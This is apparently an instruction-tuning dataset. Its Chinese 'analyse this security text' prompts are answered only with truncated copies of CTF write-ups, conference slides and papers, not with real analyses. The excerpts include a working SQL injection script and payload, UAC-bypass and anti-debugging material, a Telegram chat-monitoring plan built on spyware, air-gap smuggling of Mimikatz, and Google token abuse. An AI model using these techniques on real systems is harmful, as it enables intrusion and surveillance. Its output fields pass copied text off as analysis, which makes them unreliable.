{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 电报监控平台建设 ## 现有思路 ### 思路一 网页版登入爬虫获取群组聊天内容 ### 思路二 使用Telegram Bot获取群组聊天内容解决验证问题 ### 思路三  借助Telegram API[tdlib](https://core.telegram.org/tdlib)使用python收发信息收到的信息格式化后用Flask Web呈现 > TDLib can be used from Python through the JSON interface. ### 思路四  捕获网路数据包解密HTTPS包获取相关信息 > 为了使Wireshark解密数据包它需要访问Telegram使用的加密密钥而该密钥不能直接访问您将需要某种方式来访问Telegram使用的内存弄清楚该内存的哪一部分是加密密钥然后使用该密钥解密数据 > > https://security.stackexchange.com/questions/194863/how-can-i-sniff-telegram-packets-before-they-get-encrypted ## 搭建步骤 ### 构建tdlib 项目官网https://github.com/tdlib/td 项目根目录下有个build.html可以选择自己的平台信息生成响应的构建命令比较方便 ### 使用example 项目根目录下有个example文件夹里面是构建不同平台telegram的示例 ### python-telegram https://github.com/alexander-akhmetov/python-telegram 另一个项目编写好的tdlib Python API更加方便的进行调用 ```bash 2020-05-25 02:00:45,867 [INFO] telegram.client: Sending encryption key Traceback (most recent call last): File \"./echo_bot.py\", line 31, in <module> tg.login() File \"/usr/local/lib/python3.7/dist-packages/telegram/client.py\", line 496, in login result.wait(raise_exc=True) File \"/usr/local/lib/python3.7/dist-packages/telegram/utils.py\", line 45, in wait raise RuntimeError(f'Telegram error: {self.error_info}') RuntimeError: Telegram error: {'@type': 'error', 'code': 400, 'message': 'Wrong password', '@extra': {'request_id': 'updateAuthorizationState'}} ``` 第一次登入成功后后面的login均出现了这个错误待解决 [TODO] ## 参考的产品 [1] https://ikeymonitor.tw/telegram-spy-app [2] Telegram Spyware, https://www.iavcei.org/5-best-telegram-spy-app-in-2020/ ## References", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# HR Agency * Category: Web * 250 Points * Solved by the JCTF Team ## Description > Welcome to the HR agency! > > You can updates your bio and personal details by the following link and credentials: > > URL: https://hragency.appsecil.ctf.today/ > > Email: paula74@hunter-harris.net > > Password: x!k_856hBM > > Note: please dont set your private used password, there are hackers that leaking our data. ## Hint > NoSQL objectifying people! ## Solution Using the provided credentials, we can login to an HR system which contains several personal details (Name, email, etc.). The sources contain the following logic for personal information retrieval: ```javascript fetch(\"/api/getUserDetails\", { method: 'post', body: JSON.stringify({\"user_id\":getCookie(\"user_id\")}), }) .then(res => res.json()).then(function(res) { if(!res.isSuccess) { $(\"#response\").html(`<div class=\"alert alert-danger\" role=\"alert\">${res.errorMessage}</div>`) return } $(\"#firstName\").val(res.first_name) $(\"#lastName\").val(res.last_name) $(\"#email\").val(res.email) $(\"#company\").val(res.company) $(\"#job\").val(res.job) $(\"#phone_number\").val(res.phone_number) $(\"#address\").val(res.address) $(\"#about\").html(res.about) }); document.querySelector('form').addEventListener('submit', event => { event.preventDefault(); $(\"#response\").html(`<div class=\"alert alert-danger\" role=\"alert\">Currently unavailable!</div>`) }); ``` When logging in, the server sets two cookies: ```console root@kali:/media/sf_CTFs/appsec/HR_Agency# curl 'https://hragency.appsecil.ctf.today/api/login' --data-raw '{\"email\":\"paula74@hunter-harris.net\",\"password\":\"x!k_856hBM\"}' -q -v 2>&1 | grep cookie < set-cookie: access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6InBhdWxhNzRAaHVudGVyLWhhcnJpcy5uZXQifQ.Z1izJjkHOFq2XTf3xLDApb73S3EtywfZKVUvfEIoq3A; Path=/; SameSite=lax < set-cookie: user_id=5f8b2e54a5b8134d764f65a8; Path=/; SameSite=lax ``` The first one is a JWT with the user email: ```console root@kali:/media/sf_CTFs/appsec/HR_Agency# pyt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n萬劫持 本地提权 情報滲透 越級注入 PS C:\\> [System.Convert]::ToBase64String([System ext.Encoding]::UTF8.GetBytes(\"PS cmd.exe /c \"dir\" 141414141414141414141 AAAAAAAAAAAAAAAAAAAAAAA aaaddress1@chroot.org 遠程後 網軍動 Duplicate Paths Attack: Get Elevated Privilege from Forged Identities $_whoami #Windows #Reversing #Pwn #Exploit  Master degree at CSIE, NTUST  Security Researcher - chrO.ot  Speaker - BlackHat, DEFCON, VXCON, HITCON  30cm.tw  Hao's Arsenal  aaaddress1@chroot.org aaaddress1@chroot.org 1. UAC Design > Privilege Duplicate > Double Trust Auth 2. Issues > Path Normalization 3. A Combo, inject unlimited agents $_cat ./agenda aaaddress1@chroot.org UAC Design aaaddress1@chroot.org $_cat ./uac aaaddress1@chroot.org $_cat ./uac aaaddress1@chroot.org $_cat ./uac aaaddress1@chroot.org $_cat ./uac aaaddress1@chroot.org $_cat ./uac $ svchost.exe -k netsvcs -p -s Appinfo 說到創建Process事情 對作業系統主要就是兩個問題 程式碼要擺哪裡 執緒該怎麼執 syscall Ring0 Ring3 Parent Process (A.) CreateProcess Child Process (B.) Child Proess Created, EXE File Mapped, Gained the Same Privilege and New Thread pointed to RtlUserThreadStart (C.) Kernel Create a new Thread: RtlUserThreadStart LdrInitializeThunk LdrpInitializeProcess (D.) Jump into AddressOfEntry AppInfo!RAiLaunchAdminProcess syscall Ring0 Ring3 Parent Process (A.) RunAs, CreateProcessAsUser or CreateProcessWithToken UAC Service (B.) Send a task by RPC message to UAC service for creating a different privilege child process RPC Priv Auth (C.) verify new process is qualified or not Child Process Task Cancelled Y N (D.) Child process is created by CreateProcessAsUser with specific token by Parent Process syscall Ring0 Ring3 Parent Process (A.) RunAs, CreateProcessAsUser or CreateProcessWithToken (B.) Send a task by RPC message to UAC service for creating a different privilege child process RPC (C.) verify new process is qualified or not Child Process Task Cancelled Y N (D.) Child process is created by CreateProcessAsUser with specific token by Parent Process AppInfo!RAiLaunch", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# The Heap 堆在初始化时, 会检查`heap flags`, 并视一些标志位的有无设置而对环境作出额外的改变. 像`Themida`就有采用这种方法来检测调试器. 比如: * 如果设置了`HEAP_TAIL_CHECKING_ENABLED`标志(见`Heap Flags`节), 那么在32位windows中就会在分配的堆块尾部附加2个`0xABABABAB`(64位环境就是4个). * 如果设置了`HEAP_FREE_CHECKING_ENABLED`(见`Heap Flags`节)标志, 那么当需要额外的字节来填充堆块尾部时, 就会使用`0xFEEEFEEE`(或一部分)来填充 那么, 一种新的检测调试器的方法就是来检查这些值. ## 堆指针已知 如果已知一个堆指针, 那么我们可以直接检查堆块里的数据. 然而在`Windows Vista`及更高版本中采用了堆保护机制(32位/64位都有), 使用了一个异或密钥来对堆块大小进行了加密. 虽然你可以选择是否使用密钥, 但是默认是使用的. 而且就堆块首部的位置, 在`Windows NT/2000/XP`和`Windows Vista及更高版本`之间也是不相同的. 因此我们还需要将`Windows版本`也考虑在内. 可以使用以下32位代码来检测32位环境: ``` asm xor ebx, ebx call GetVersion cmp al, 6 sbb ebp, ebp jb l1 ;Process Environment Block mov eax, fs:[ebx+30h] mov eax, [eax+18h] ;get process heap base mov ecx, [eax+24h] ;check for protected heap jecxz l1 mov ecx, [ecx] test [eax+4ch], ecx cmovne ebx, [eax+50h] ;conditionally get heap key l1: mov eax, <heap ptr> movzx edx, w [eax-8] ;size xor dx, bx movzx ecx, b [eax+ebp-1] ;overhead sub eax, ecx lea edi, [edx*8+eax] mov al, 0abh mov cl, 8 repe scasb je being_debugged ``` 或使用以下64位代码检测64位环境: ``` xor ebx, ebx call GetVersion cmp al, 6 sbb rbp, rbp jb l1 ;Process Environment Block mov rax, gs:[rbx+60h] mov eax, [rax+30h] ;get process heap base mov ecx, [rax+40h] ;check for protected heap jrcxz l1 mov ecx, [rcx+8] test [rax+7ch], ecx cmovne ebx, [rax+88h] ;conditionally get heap key l1: mov eax, <heap ptr> movzx edx, w [rax-8] ;size xor dx, bx add edx, edx movzx ecx, b [rax+rbp-1] ;overhead sub eax, ecx lea edi, [rdx*8+rax] mov al, 0abh mov cl, 10h repe scasb je being_debugged ``` 这里没有使用32位代码检测64位环境的样例, 因为64位的堆无法由32位的堆函数解析. ## 堆指针未知 如果无法得知堆指针, 我们可以使用`kernel32`的`HeapWalk()`函数或`ntdll`的`RtlWalkHeap()`函数(或甚至是`kernel32`的`GetCommandLine()`函数). 返回的堆大小的值会被自动解密, 因此就不需要再关心windows的版本 可以使用以下32位代码来检测32位环境: ``` asm mov ebx, offset l2 ;get a pointer to a heap block l1: push ebx mov eax, fs:[30h] ;Process Environment Block push d [eax+18h] ;save process heap base call HeapWalk cmp w [ebx+0ah], 4 ;find allocated block jne l1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# uncomfortable web (web, 300, 78 solves) > Attack to http://127.0.0.1:81/authed/ through the uploaded script at http://uncomfortableweb.pwn.seccon.jp/. > Get the flag in the database! We start off by making a quick script to quickly send our python scripts: ``` python h = HTMLParser() url = \"http://uncomfortableweb.pwn.seccon.jp/?\" files = {'file': open('uncom.py', 'rb')} r = requests.post(url=url, files=files) print(h.unescape(r.text[290:-436])) ``` After a quick traversal, we notice two interesting things: * `127.0.0.1:81/select.cgi` * `127.0.0.1:81/authed/sqlinj/` First link allows us to get the .htaccess file from `authed` directory, which we can brute and get the login/pass. As for the second link, the directory's name strongly suggest a sql injection, there are 100 cgi files insides, so we can guess, that only one/few of them actually have sqli in them. Let's try to inject `' or '1'='1` into every page: ``` python conn = httplib.HTTPConnection('127.0.0.1', 81) headers = {} headers[\"Authorization\"] = \"Basic {0}\".format(base64.b64encode(\"{0}:{1}\".format('keigo', 'test'))) for i in range(100): conn.request(\"GET\", \"/authed/sqlinj/{}}.cgi?no=\".format(str(i))+urllib.quote_plus(\"4a' or '1'='1' union SELECT *, null, null FROM f1ags /*\"), None, headers) res = conn.getresponse() print(res.read().decode(\"utf-8\")) conn.close() ``` The important thing here, is that we urlencode the payload, it wouldn't work otherwise. In return we get: ``` . . . 70 link 71 link 72 link ISBN-10: 4822267865 ISBN-13: 978-4822267865 PUBLISH: 2015/2/20 ISBN-10: 4822267911 ISBN-13: 978-4822267919 PUBLISH: 2015/8/27 ISBN-10: 4822267938 ISBN-13: 978-4822267933 PUBLISH: 2016/2/19 ISBN-10: 4822237842 ISBN-13: 978-4822237844 PUBLISH: 2016/8/25 73 link . . . ``` Success! The db turns out to be sqlite, after some fiddling with the `sqlite_master` table, we finally arrive with the final exploit: `SECCON{I want to eventually make a CGC web edition... someday...}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@ripshy + @hackajar Thursday July 26th, 2012  Ripshy  90% Badass / 10% Cuddly  Attending CON since 2002, supporting role since 2004, Vegas 2.0 Co-Founder  Hackajar  90% Cuddly / 10% Badass  Attending CON since 2000, supporting role since 2004, Vegas 2.0 Co-Founder  Getting Started with BackTrack 5 R2  Getting to know the top 5 PenTest Tools  Using Top 5 Tools in IT Sec Environment  Break Stuff! Tools in action  Q/A (to be hosted in separate room)  Live InfoSec Linux Distro  Functional Toolset  Information Gathering  Penetration (DV-DA!)  Etc.  Developed by BAMFs  http://www.offensive-security.com  Boot your CDs  Or your computer if you pre-installed  The biggest inside joke: What is roots password?  toor (and we will not repeat it!)  Where are my network services?  Network is not started by default  Neither is SSHD  Dont Forget to save changes!!!  http://www.backtrack-linux.org/wiki/index.php/Basic_Usage  Nmap  Tcpdump  libpcap  nc  Ntop  MetaSploit  Developed by Fyodor in years past  Bumping into him? Ask about The Matrix movie!  Maintained at http://www.insecure.org  Current version is new 6.0 branch  What it does:  Scans network for open ports, alive hosts, OS Fingerprinting, and much more!  We only care about scanning and OS fingerprinting today  How to use:  localhost# nmap v sT F A oG output.grep 10.x.x.x/24  What the heck does that mean?  -v  Increase the verbosity of output  -sT  Do a full TCP connection to all ports  -F  Fast scan, only scan ports in /etc/services  -A  Enable OS fingerprinting + other features  -oG  Output to grepable format  10.x.x.x/24  Scan all 254 hosts in range given  Output:  Developed by LBNL in years past  Maintained at http://www.tcpdump.org  Current version is 4.4.0 (June 2012)  What it does:  Dumps all traffic seen on a network Interface to screen or file  We will only capture basic packets and do simple analysis  How to use:  localhost# tcpdump i eth0 n -x  What the heck does that mean?  -i  Interface we want to listen to (eth0)  -n  T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 计算机操作系统 - 内存管理 <!-- GFM-TOC --> * [计算机操作系统 - 内存管理](#计算机操作系统---内存管理) * [虚拟内存](#虚拟内存) * [分页系统地址映射](#分页系统地址映射) * [页面置换算法](#页面置换算法) * [1. 最佳](#1-最佳) * [2. 最近最久未使用](#2-最近最久未使用) * [3. 最近未使用](#3-最近未使用) * [4. 先进先出](#4-先进先出) * [5. 第二次机会算法](#5-第二次机会算法) * [6. 时钟](#6-时钟) * [分段](#分段) * [段页式](#段页式) * [分页与分段的比较](#分页与分段的比较) <!-- GFM-TOC --> ## 虚拟内存 虚拟内存的目的是为了让物理内存扩充成更大的逻辑内存从而让程序获得更多的可用内存 为了更好的管理内存操作系统将内存抽象成地址空间每个程序拥有自己的地址空间这个地址空间被分割成多个块每一块称为一页这些页被映射到物理内存但不需要映射到连续的物理内存也不需要所有页都必须在物理内存中当程序引用到不在物理内存中的页时由硬件执行必要的映射将缺失的部分装入物理内存并重新执行失败的指令 从上面的描述中可以看出虚拟内存允许程序不用将地址空间中的每一页都映射到物理内存也就是说一个程序不需要全部调入内存就可以运行这使得有限的内存运行大程序成为可能例如有一台计算机可以产生 16 位地址那么一个程序的地址空间范围是 0\\~64K该计算机只有 32KB 的物理内存虚拟内存技术允许该计算机运行一个 64K 大小的程序 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/7b281b1e-0595-402b-ae35-8c91084c33c1.png\"/> </div><br> ## 分页系统地址映射 内存管理单元MMU管理着地址空间和物理内存的转换其中的页表Page table存储着页程序地址空间和页框物理内存空间的映射表 一个虚拟地址分成两个部分一部分存储页面号一部分存储偏移量 下图的页表存放着 16 个页这 16 个页需要用 4 个比特位来进行索引定位例如对于虚拟地址0010 000000000100前 4 位是存储页面号 2读取表项内容为110 1页表项最后一位表示是否存在于内存中1 表示存在后 12 位存储偏移量这个页对应的页框的地址为 110 000000000100 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/cf4386a1-58c9-4eca-a17f-e12b1e9770eb.png\" width=\"500\"/> </div><br> ## 页面置换算法 在程序运行过程中如果要访问的页面不在内存中就发生缺页中断从而将该页调入内存中此时如果内存已无空闲空间系统必须从内存中调出一个页面到磁盘对换区中来腾出空间 页面置换算法和缓存淘汰策略类似可以将内存看成磁盘的缓存在缓存系统中缓存的大小有限当有新的缓存到达时需要淘汰一部分已经存在的缓存这样才有空间存放新的缓存数据 页面置换算法的主要目标是使页面置换频率最低也可以说缺页率最低 ### 1. 最佳 > OPT, Optimal replacement algorithm 所选择的被换出的页面将是最长时间内不再被访问通常可以保证获得最低的缺页率 是一种理论上的算法因为无法知道一个页面多长时间不再被访问 举例一个系统为某进程分配了三个物理块并有如下页面引用序列 ```html 70120304230321201701 ``` 开始运行时先将 7, 0, 1 三个页面装入内存当进程要访问页面 2 时产生缺页中断会将页面 7 换出因为页面 7 再次被访问的时间最长 ### 2. 最近最久未使用 > LRU, Least Recently Used 虽然无法知道将来要使用的页面情况但是可以知道过去使用页面的情况LRU 将最近最久未使用的页面换出 为了实现 LRU需要在内存中维护一个所有页面的链表当一个页面被访问时将这个页面移到链表表头这样就能保证链表表尾的页面是最近最久未访问的 因为每次访问都需要更新链表因此这种方式实现的 LRU 代价很高 ```html 47071012126 ``` <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/eb859228-c0f2-4", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Insiders Options Michael Rich mike@tofet.net The Challenge The Tools Available Phase 0  Set up Phase 1  Hex Attack Phase 2  Attack of the Big Barcode Bringing it all Together Future/Branch Research Paths Conclusion There I was, hacking the collaboration portal.. How could I intercept the POST call to modify the inputs? Tamper Data, Burp Suite, etc.. How could I forge the POST call? Curl, wget, etc.. Eventually: How could I load one of these tools on to my closed, secure network without getting caught? Closed, secured network (sort of) USB ports secured & monitored CD use secured & monitored Host-based security system Data transfer entry points do exist (DOTS) Not in control of attacker Unknown scanning rules Leaves logs Windows / MS-Office environment MS Office = Visual Basic for Applications Professional level printers & scanners Adobe Acrobat OCR Put Excel into attack mode Consolas Font  Down to 8 pt font Use Phase 0 methods to make Excel a binary file hex encoder/decoder Why hex? Printable text Tests showed excellent OCR results Hex Encoding Base64 Encoding Encoding Consolas, 8 pt font Consolas, 12 pt font Word Length Errors (80 char words) 0 in 73 words 9 in 73 words Transcription Errors 0 in 5840 symbols 216 in 5840 symbols Error Types 1 to 1 Many to Many Hex Encoding is good, but probably not perfect Need compact error detection 2-byte XOR checksum Assumptions, assumptions, assumptions 1551 errors in 135,420 symbols (1.1 % error) B to 8: 261; 1 to l: 359; 5 to S: 864 D to 0, O: 57; 6 to G,q,b: 3 Alternative characters: # for B ? for D Auto-replace other major errors l, S, .,   Add strong visual indicators 1 manual correction in 1210 lines of text Demo Time! Pros: Extremely reliable Can be entered by hand if no scanner Cons: Low data density: ~3.6K per page best case Common Tools: PowerSploit: 835 kB = 232 pages Mimikatz: 538 kB = 150 pages No exfiltration compression advantage ~ 25K data per page 60% error correction Good features Timing lines Reed-Solomon ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHTTP/2: The Sequel is Always Worse James Kettle - james.kettle@portswigger.net - @albinowax HTTP/2 is easily mistaken for a transport-layer protocol that can be swapped in with zero security implications for the website behind it. Two years ago, I presented HTTP Desync Attacks and kicked off a wave of request smuggling, but HTTP/2 escaped serious analysis. In this paper, I'll take you beyond the frontiers of existing HTTP/2 research, to unearth horrifying implementation flaws and subtle RFC imperfections. I'll show you how these flaws enable HTTP/2-exclusive desync attacks, with case studies targeting high- profile websites powered by servers ranging from Amazon's Application Load Balancer to WAFs, CDNs, and bespoke stacks by big tech. I'll demonstrate critical impact by hijacking clients, poisoning caches, and stealing plaintext passwords to net multiple max-bounties. One of these attacks remarkably offers an array of exploit-paths surpassing all known techniques. After that, I'll unveil novel techniques and tooling to crack open a widespread but overlooked request smuggling variant affecting both HTTP/1 and HTTP/2 that is typically mistaken for a false positive. Finally, I'll drop multiple exploit-primitives that resurrect a largely forgotten class of vulnerability, and use HTTP/2 to expose a fresh application-layer attack surface. I'll leave you with an open-source scanner with accurate automated detection, a custom, open-source HTTP/2 stack so you can try out your own ideas, and free interactive labs so you can hone your new skills on live systems. Outline HTTP/2 for Hackers Pseudo-Headers Binary Protocol Message Length HTTP/2 Desync Attacks H2.CL on Netflix H2.TE on Application Load Balancer H2.TE via Request Header Injection H2.X via Request Splitting H2.TE via Header Name Injection H2.TE via Request Line Injection Desync-Powered Request Tunnelling Confirmation Tunnel Vision Exploitation: Guessing Internal Headers Exploitation: Leaking Internal Headers Exploit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1083-win-文件和目录发现 ## 来自ATT&CK的描述 攻击者可以枚举文件和目录也可以在主机或网络共享的特定位置搜索文件系统中的某些信息攻击者可以在自动发现期间使用文件和目录发现中的信息来塑造后续行为包括攻击者是否完全感染目标和/或尝试特定操作 ## 测试案例 windows 用于获取此信息的示例实用程序有dir和tree还可以使用自定义工具收集文件和目录信息并与Windows API交互 Mac和Linux 在Mac和Linux中这种发现是通过lsfind和locate命令完成的 ## 检测日志 windows安全日志 ## 测试复现 这里主要演示windows主机下执行dir命令以及tree命令 ## 测试留痕 模拟测试windows server 2016 下对dir命令不做记录 ## 检测规则/思路 ### sigma规则 ```yml title: 在windows文件和目录发现 description: windows server 2016 tags: T1083 status: experimental author: 12306Bro logsource: product: windows service: security detection: selection: EventID: 4688 #已创建新的进程 Newprocessname: 'C:\\windows\\system32\\tree.com' #进程信息>进程名称 Creatorprocessname: 'C:\\windows\\system32\\cmd.exe' #进程信息>创建者进程名称 Processcommandline: tree #进程信息>进程命令行 condition: selection level: medium ``` ### 建议 暂无 ## 参考推荐 MITRE-ATT&CK-T1083 <https://attack.mitre.org/techniques/T1083/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking in the Name of Science Tadayoshi (Yoshi) Kohno (University of Washington) Jon Callas (PGP Corporation) Alexei Czeskis (University of Washington) Daniel Halperin (University of Washington) Karl Koscher (University of Washington) Michael Piatek (University of Washington) DEFCON 16 - August 8, 2008 Who We Are  Researchers at the University of Washington  Tadayoshi Kohno, http://www.cs.washington.edu/homes/yoshi/  Alexei Czeskis,http://www.cs.washington.edu/homes/aczeskis/  Daniel Halperin, http://www.cs.washington.edu/homes/ dhalperi/  Karl Koscher, http://www.cs.washington.edu/homes/supersat/  Mike Piatek, http://www.cs.washington.edu/homes/piatek/  Co-founder of PGP Corporation  Jon Callas, jon@callas.org Focus for Today Explore hacking in the academic community For concreteness, we base this talk on our own research (often in collaboration with others) We call this line of work many things, like attacks research or measurements, but never hacking About Yoshi  Others will introduce themselves when they first start  Ph.D. from University of California San Diego  Lots of crypto / mathy stuff  But also lots of work on analyzing real systems -- and thats the focus of todays talk  Past industry work: Bruce Schneiers old company, and Cigital  Now: Faculty at the University of Washington Previews for Today First public analysis of Diebolds AccuVote-TS e-voting source code (2003, Kohno, Stubblefield, Rubin, Wallach) Previews for Today First public analysis of a common wireless implantable medical device (2008, Halperin, Heydt-Benjamin, Ransford, Clark, Defend, Morgan, Fu, Kohno, Maisel) Previews for Today Measurement study of in-flight changes to web pages by ISPs and others (2008, Reis, Gribble, Kohno, Weaver) ISP Firewall Previews for Today Measurement study of DMCA notices in BitTorrent (2008, Piatek, Krishnamurthy, Kohno) Previews for Today Fingerprinting physical machines based on information leakage and clock skew (2005,Kohno, Broido, and Claffy) Previews for Toda", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Six Year Old Hacker: The Six Year Old Hacker: No More Script Kiddies? No More Script Kiddies? Kevin McCarthy Kevin McCarthy DefCon 13 30/Jul/2005 DefCon 13 30/Jul/2005 A Need Born of Frustration. A Need Born of Frustration.  So what did you do at school today So what did you do at school today??  The problem with computers, (computer The problem with computers, (computer based) instruction in elementary schools. based) instruction in elementary schools.  The Good, The Bad, The Ugly. The Good, The Bad, The Ugly.  Many schools have well considered Many schools have well considered Technology Plans Technology Plans..  The absence of a plan usually means drill The absence of a plan usually means drill and kill. and kill. A Need Born of Frustration. A Need Born of Frustration.  The Good. The Good.  Keyboarding Keyboarding  Research Research  Document production Document production  The Bad. The Bad.  Drill and Kill Drill and Kill  Edutainment Edutainment A Need Born of Frustration. A Need Born of Frustration.  The Ugly The Ugly  MS Office skills MS Office skills  Research Research  Keyboarding Keyboarding A Need Born of Frustration. A Need Born of Frustration.  The Environment The Environment  Labs Labs  Locked Down and Hands Off Locked Down and Hands Off  After School After School  Uninformed caretakers. Uninformed caretakers.  Insufficient supervision. Insufficient supervision.  Inappropriate use. Inappropriate use. Other Models Other Models  Going old Going old--school on 'em. school on 'em.  Self taught. Self taught.  The spirit of hacking: Doing science in a The spirit of hacking: Doing science in a constructed world. constructed world.  Is the elementary school the right place for Is the elementary school the right place for PCs? PCs? The Plan The Plan \"Any subject can be taught effectively in some \"Any subject can be taught effectively in some intellectually honest form to any child at any intellectually honest form to any child at any stage of development.\" s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMobile Application Web API Reconnaissance: Web-to-Mobile Inconsistencies & Vulnerabilities Abner Mendoza, Guofei Gu Texas A&M University abmendoza@tamu.edu, guofei@cse.tamu.edu AbstractModern mobile apps use cloud-hosted HTTP-based API services and heavily rely on the Internet infrastructure for data communication and storage. To improve performance and leverage the power of the mobile device, input validation and other business logic required for interfacing with web API services are typically implemented on the mobile client. However, when a web service implementation fails to thoroughly replicate input validation, it gives rise to inconsistencies that could lead to attacks that can compromise user security and privacy. Developing automatic methods of auditing web APIs for security remains challenging. In this paper, we present a novel approach for automatically analyzing mobile app-to-web API communication to detect in- consistencies in input validation logic between apps and their respective web API services. We present our system, WARDroid, which implements a static analysis-based web API reconnaissance approach to uncover inconsistencies on real world API services that can lead to attacks with severe consequences for potentially millions of users throughout the world. Our system utilizes program analysis techniques to automatically extract HTTP communication templates from Android apps that encode the input validation constraints imposed by the apps on outgoing web requests to web API services. WARDroid is also enhanced with blackbox testing of server validation logic to identify inconsistencies that can lead to attacks. We evaluated our system on a set of 10,000 popular free apps from the Google Play Store. We detected problematic logic in APIs used in over 4,000 apps, including 1,743 apps that use unencrypted HTTP communication. We further tested 1,000 apps to validate web API hijacking vulnerabilities that can lead to potential compromise of user privacy an", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe good and bad about Streaming media How streaming media can be stolen and how to protect it. Who are you? tommEE pickles Crazy clown from NYC Lives in LA Single Arrested, Jailed Media Whored Likes to drink Qualifications Over 12 years of commercial computer experience Worked on Computer Radar Controlled Weapon Systems Developed streaming media solutions for Digital Club Network Runs media website Moloch.TV Always encoding TiVo Videos and storing them on a file server. What the hell is Streaming Media? Streaming Media is multimedia content transported though protocol like http, pnm, rtsp, or mms Common types of Streaming Media are  Real Networks (aka Real One)  Shoutcast, Icecast (aka MP3 streaming)  Microsoft Windows Media (aka most proprietary) Media Players Quick and dirty intro to the different clients. Real Player Windows Media Player Quicktime Winamp, etc Real Player Plays lots of file formats Multi platform  Windows  Unix  Mac  Linux SureStream Technology Full Screen MPEG4 with Envivo Plug-in But Real Player Plus Version costs money Player has not been updated on Unix  Update: codec has been updated Sole purpose seems to be commerce Windows Media Multiple media formats: asf, wmv, avi, mpeg, mp3 Included with Windows Skin-able Full Screen Large Demographic Wine will support Media Player 6.4 But Windows Media DRM (Digital Rights Management) No constancy between player versions. Makes use of shared libraries for codec Quicktime Player Supports MPEG4 Can edit files Supports Windows and Mac But Quicktime Not supported by Unix without wine  Plugger is an exception Full screen only used in Paid Versions Editing only used in Paid Version The servers Brief introduction into the various servers that have ability to stream Real Server Windows Media Server Darwin Shoutcast, Icecast Real Server Its free (to an extent) Its multi platform, runs from cmd line Its widely used But Its costly and can be exploited Quicktime Server Free Server But Not as easy to serve stuff Has", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIOActive, Inc. Copyright 2014. All Rights Reserved. Weird-Machine Motivated Practical Page Table Shellcode & Finding Out What's Running on Your System Shane Macaulay Director of Cloud Services IOActive, Inc. Copyright 2014. All Rights Reserved. The Long Road  Barnaby Jack, forever in our hearts and minds. Its about the journey not the destination. IOActive, Inc. Copyright 2014. All Rights Reserved. 13 Years since ADMMutate (slide URL) http://1drv.ms/1xUpxL9  ADMmutate (last DC talk was about polymorphic shellcode)  The more things change  The more they stay the same  Thought about PT shellcode with ADMMutate  Attack is [hard/stress/]fun!!&$&%*:P;p;P  Defense is hard/stress IOActive, Inc. Copyright 2014. All Rights Reserved. Abusing x for fun & profit!  Its usually the QB that gets the headlines, offensive bias in hacker scene!  Defense is grinds it out for little glory.  Lets energize the D here, have some fun!!  A Defensive exploit  Ultimately today were killing process hiding rootkits cross 64bit OS/Platforms TODAY!  DKOM IS DEAD! Process hiding is DEAD! IOActive, Inc. Copyright 2014. All Rights Reserved. Also 13 Years ago  What else was going on back then?  x86 assembler in Bash cLIeNUX shasm is an assembler written in GNU Bash Version 2, which may work in other recent unix-style \"shell\" command interpreters. IOActive, Inc. Copyright 2014. All Rights Reserved. Ideals  As best as possible, figure out all running code  Code/hacks/weird machine's included/considered  When have we done enough?  We focus on establishing our understanding through real world targets: Hypervisor monitored guests.  Combine protection pillars; structure analysis, physical memory traversal and integrity checking. IOActive, Inc. Copyright 2014. All Rights Reserved. Practical concepts  Attacks: WeIrD MaChinE  Lots of fun!  Much esoteric/eclectic More fantastical!!!  Defense: Detecting * That means everything  Home field == USE THE FORCE A HYPERVISOR!  Establishes verifiability of device state", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAndroid weblogin: Google's Skeleton Key Craig Young, Tripwire VERT # whoami I research, identify, and disclose vulnerabilities as a senior researcher in Tripwire VERT. I enjoy long bike rides, breaking things which fail to sanitize input, and building furniture with my wife on the weekend. DISCLAIMER: I am definitely not an Android developer. Talk Overview (tl;dr) 1. Android trades security for convenience 2. weblogin: can bypass password prompts 3. Security tools do not detect token egress 4. 1 token can fully compromise Google Apps About weblogin:  Android Token Type: weblogin:service=youtube&continue=https://www.youtube.com/  Grants cookies for the desired service  Acts in lieu of password entry Abusing weblogin:  Cookies obtained are not limited by service  App may ask for YouTube and then read your email  Android permission prompts are misleading  i.e. a YouTube token also gives access to GMail  Prompt is once per app per token type  Root or physical access is also token access HOWTO: Hack Google Apps 1. Retrieve weblogin: token for domain admin 2. Access domain control panel  www.google.com/a/domain.com 3. Get drunk (with power) Using the Skeleton Key  